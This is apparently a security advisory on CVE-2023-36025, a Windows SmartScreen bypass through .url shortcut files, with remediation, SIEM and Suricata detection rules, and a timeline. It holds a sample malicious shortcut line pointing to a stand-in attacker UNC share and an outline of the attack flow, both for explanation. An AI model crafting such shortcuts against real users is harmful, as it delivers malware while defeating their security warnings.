Background
Windows SmartScreen is a security feature that warns users when they try to open files downloaded from the internet that aren’t signed by a trusted publisher or haven’t been seen by many users. It’s part of the Mark of the Web (MotW) mechanism — when Windows downloads a file, it tags it with an ADS (Alternate Data Stream) attribute indicating where it came from. SmartScreen checks for this tag before executing files.
SmartScreen bypasses are a recurring theme in Windows exploitation. CVE-2023-36025 was patched in November 2023 and was a zero-day at the time — it was being used in active campaigns before Microsoft had a fix. Unlike some SmartScreen bypasses that require complex setups, this one exploits .url shortcut files, which Windows users encounter regularly.
Technical Mechanism
Internet Shortcut files (.url) are Windows shortcuts that open URLs when double-clicked. When a .url file is downloaded from the internet, it should receive a MotW tag and SmartScreen should warn the user before it executes.
CVE-2023-36025 exploits a flaw in how Windows handles .url files that contain a URL= pointing to a network share (UNC path) or specific URL patterns. By crafting a .url file that references a network share path (e.g., URL=\\attacker-ip\share\malware.exe), the SmartScreen check is bypassed — Windows doesn’t apply the MotW warning for these shortcut types even when the shortcut file itself was downloaded from the internet.
The attack flow:
- Attacker crafts a malicious
.urlfile withURL=\\attacker-ip\share\payload.exeor similar - File is delivered to target via phishing email or malicious download
- Target double-clicks the
.urlfile - SmartScreen check is bypassed — no warning shown
- The referenced payload is executed immediately
The bypass is particularly effective because .url files look innocuous (they appear as internet shortcuts with familiar icons), and users are conditioned to expect website URLs, not to recognise malicious UNC paths.
Real-World Exploitation Evidence
Phemedrone Stealer and similar malware families were distributed using CVE-2023-36025 in active campaigns:
- Phemedrone Stealer — an information stealer that harvests passwords, browser data, cryptocurrency wallets, and system information; distributed via
.urlfiles exploiting this bypass - DarkGate malware — observed using SmartScreen bypass techniques including CVE-2023-36025 in distribution campaigns
- Various phishing campaigns — multiple threat actors adopted the bypass for malware delivery shortly after it became public knowledge
Microsoft assessed this as having been exploited before the patch was released, qualifying it as a zero-day.
Impact Assessment
- Malware execution without user warning — defeats a key user-facing security layer
- Credential theft — Phemedrone and similar stealers harvest all stored credentials, browser history, and sensitive files
- Cryptocurrency wallet compromise — stealers specifically target crypto wallets
- Initial access for ransomware — information stolen via stealers is used to enable follow-on ransomware attacks
- Widespread reach — the effectiveness depends on user click-through, but given how often phishing succeeds, this is a meaningful amplifier
- Bypasses corporate controls — organisations that rely on SmartScreen as a security control have that control circumvented
Affected Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Windows 10 (all supported versions) | Before November 2023 patches | KB5032189 and related |
| Windows 11 (all versions) | Before November 2023 patches | KB5032190 and related |
| Windows Server 2019 | Before November 2023 patches | KB5032196 |
| Windows Server 2022 | Before November 2023 patches | KB5032198 |
Remediation Steps
- Apply November 2023 Patch Tuesday updates (or later cumulative updates)
- Verify patch status on all endpoints:
Get-HotFix | Where-Object {$_.HotFixID -eq "KB5032189"} - Consider Group Policy to restrict execution of
.urlfiles from untrusted sources - Configure email security to quarantine
.urlfile attachments — these are rarely needed in business email - Enable enhanced SmartScreen policies via Group Policy:
- Computer Configuration > Administrative Templates > Windows Components > File Explorer > Configure Windows SmartScreen
- Deploy endpoint detection tools that can flag
.urlfiles containing UNC paths in email attachments or downloads - User awareness training — train users to be suspicious of
.urlshortcut files in emails
Detection Guidance
Endpoint monitoring — look for:
.urlfiles downloaded from the internet (browser download events)- Execution of processes spawned from
.urlshortcut handler (rundll32.exe,ieframe.dll) - Network connections to UNC paths immediately after a
.urlfile is opened
Email security gateway — block or quarantine .url file attachments; very few legitimate business use cases require sending these.
SIEM detection:
process_name = "rundll32.exe" AND command_line CONTAINS "ieframe.dll,OpenURL" AND parent = "explorer.exe"
Suricata signature:
alert smb any any -> $HOME_NET any (msg:"Possible CVE-2023-36025 SmartScreen Bypass UNC Request"; flow:established,to_server; content:"|ff|SMB"; offset:4; depth:4; classtype:policy-violation; sid:2034015; rev:1;)
Timeline
| Date | Event |
|---|---|
| Before November 2023 | CVE-2023-36025 exploited as zero-day in Phemedrone Stealer campaigns |
| 14 November 2023 | Microsoft patches CVE-2023-36025 in November Patch Tuesday |
| November 2023 | CISA adds to Known Exploited Vulnerabilities catalogue |
| Late 2023 | Multiple malware families adopt the bypass technique |
| 2024 | Post-patch exploitation continues on unpatched Windows systems |